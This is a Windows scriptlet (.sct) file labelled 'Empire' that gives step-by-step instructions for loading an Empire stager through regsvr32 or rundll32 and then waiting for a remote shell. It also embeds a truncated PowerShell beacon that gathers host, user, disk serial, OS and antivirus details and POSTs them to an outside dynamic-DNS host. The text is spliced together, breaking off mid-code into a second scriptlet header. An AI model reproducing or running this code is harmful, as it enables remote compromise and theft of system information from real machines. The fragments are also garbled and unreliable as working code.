<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1166/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>